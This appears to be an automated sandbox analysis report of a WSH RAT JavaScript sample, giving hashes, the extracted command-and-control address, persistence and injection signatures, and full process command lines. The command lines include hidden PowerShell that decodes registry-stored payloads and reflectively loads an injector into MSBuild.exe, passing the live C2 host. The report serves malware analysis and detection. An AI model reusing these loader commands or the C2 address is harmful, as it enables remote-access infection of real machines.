Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
15-05-2024 02:49
Static task
static1
Behavioral task
behavioral1
Sample
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Resource
win10v2004-20240426-en
General
-
Target
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
-
Size
616KB
-
MD5
70a617fd2bdb08c64a65ecfba1612140
-
SHA1
d41eec4cb2f449b845d3f4fa3baf80086705bba6
-
SHA256
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc
-
SHA512
52c22c0b1d8b8e1b69224e4164fb75d0b07b7b1f8fb6b9b843218f0c01cae0279fe45cecbb538b021ddb7e57c723917ae2f34186881db210c8b4953b7a2b0961
-
SSDEEP
12288:NYeIrWr/qRigAyX/kngXFbjTLvaH28nZH19Iimg0VtxWvTbxzOObcizI/mofdEMa:NYeIrWr/qRigAyX/kngXFbjTLvaH28nZ
Malware Config
Extracted
wshrat
http://masterokrwh.duckdns.org:8426
Signatures
-
Blocklisted process makes network request 34 IoCs
Processes:
wscript.exeflow pid process 4 4048 wscript.exe 6 4048 wscript.exe 12 4048 wscript.exe 14 4048 wscript.exe 17 4048 wscript.exe 22 4048 wscript.exe 43 4048 wscript.exe 51 4048 wscript.exe 52 4048 wscript.exe 53 4048 wscript.exe 54 4048 wscript.exe 68 4048 wscript.exe 69 4048 wscript.exe 70 4048 wscript.exe 71 4048 wscript.exe 72 4048 wscript.exe 73 4048 wscript.exe 82 4048 wscript.exe 83 4048 wscript.exe 84 4048 wscript.exe 85 4048 wscript.exe 86 4048 wscript.exe 87 4048 wscript.exe 95 4048 wscript.exe 104 4048 wscript.exe 105 4048 wscript.exe 106 4048 wscript.exe 107 4048 wscript.exe 108 4048 wscript.exe 109 4048 wscript.exe 110 4048 wscript.exe 111 4048 wscript.exe 112 4048 wscript.exe 113 4048 wscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4920 powershell.exe 4000 powershell.exe 5004 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 2 IoCs
Processes:
wscript.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js wscript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
wscript.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js\"" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js\"" wscript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 5004 set thread context of 1380 5004 powershell.exe MSBuild.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 30 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 68 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 70 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 72 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 110 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 54 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 86 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 104 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 106 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 109 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 84 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 87 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 105 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 111 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 53 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 69 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 71 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 73 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 82 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 112 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 113 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 52 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 108 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 43 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 51 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 107 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 83 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 85 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 95 WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 4920 powershell.exe 4920 powershell.exe 4000 powershell.exe 4000 powershell.exe 5004 powershell.exe 5004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4920 powershell.exe Token: SeDebugPrivilege 4000 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
MSBuild.exepid process 1380 MSBuild.exe 1380 MSBuild.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
wscript.exepowershell.exedescription pid process target process PID 4048 wrote to memory of 4920 4048 wscript.exe powershell.exe PID 4048 wrote to memory of 4920 4048 wscript.exe powershell.exe PID 4048 wrote to memory of 4000 4048 wscript.exe powershell.exe PID 4048 wrote to memory of 4000 4048 wscript.exe powershell.exe PID 4048 wrote to memory of 5004 4048 wscript.exe powershell.exe PID 4048 wrote to memory of 5004 4048 wscript.exe powershell.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe PID 5004 wrote to memory of 1380 5004 powershell.exe MSBuild.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'masterokrwh.duckdns.org 8426 \"WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom\" 1'));"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepath masterokrwh.duckdns.org 8426 "WSHRAT|DCD44786|RHATQEDQ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom" 13⤵
- Suspicious use of SetWindowsHookEx
PID:1380
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f5e999203425db689dabef353914fdc4
SHA1d2ee16b9e7ce74e6e5b77975d3821772db691089
SHA256ee225f2a19470828215b5a9f8e76bc32c8dd8b11c8a8fa9d2bc5c89e9ec2299a
SHA512c44a365fd26b253e1a34c1f7ab24c603d3d0c5ef3095c1aa912621bda938527b80f1a78a18b06be9ef0d161db36092f699da4cc066f0e9c72aa9839af4c9eba1
-
Filesize
1KB
MD5c59b79254eac4e1713b7cb6db2f8f716
SHA1c2bb1fe5310693fc444317f6f29bd95b01f3436b
SHA2561f90f0288b54f56bc5a1ebfb0a931228d3f97b19f1ff9a3168098682ec840c63
SHA512ec1e83e4fe9d21771964a5264e65217576faddce6726eebe209c2d721a042b6d9e02935c35111a1891c9e627357c34c0f63bbf7b09497627a12e124171d2590d
-
Filesize
1KB
MD591a39b91c2b22ff00c12e56878baa09b
SHA1e19e669a9c2c8fec9fb699c4c76384a105471bda
SHA256931a2eaa61178581995773a9da78f4bfd76ad27c29b44442fa1329b384a0cd96
SHA51259df651f9cab1c7b960e22d8207766cef07393b33d42f2b759bf4043cd63f2abaf08f9e1b419c6a126fb51a98468d15d34ba09caac46dfbc1a1b658c513aa2b0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Filesize616KB
MD570a617fd2bdb08c64a65ecfba1612140
SHA1d41eec4cb2f449b845d3f4fa3baf80086705bba6
SHA256cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc
SHA51252c22c0b1d8b8e1b69224e4164fb75d0b07b7b1f8fb6b9b843218f0c01cae0279fe45cecbb538b021ddb7e57c723917ae2f34186881db210c8b4953b7a2b0961